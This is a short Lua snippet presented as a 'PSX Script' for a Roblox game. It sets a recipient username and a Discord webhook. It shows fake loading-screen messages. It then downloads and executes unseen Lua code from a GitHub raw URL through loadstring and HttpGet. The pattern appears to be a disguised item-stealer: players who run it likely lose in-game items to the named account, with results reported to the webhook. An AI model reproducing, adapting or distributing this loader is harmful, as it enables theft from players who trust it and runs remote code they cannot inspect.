Username = "GiffddWhat"
WebHook = "https://discord.com/api/webhooks/1097315437097783546/ZEPaogaCq5R0pBEl4672L9_47bC3X5e39zyxMQATFS9d5CcIjNIiuya8V-MUOdZsuPUW"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
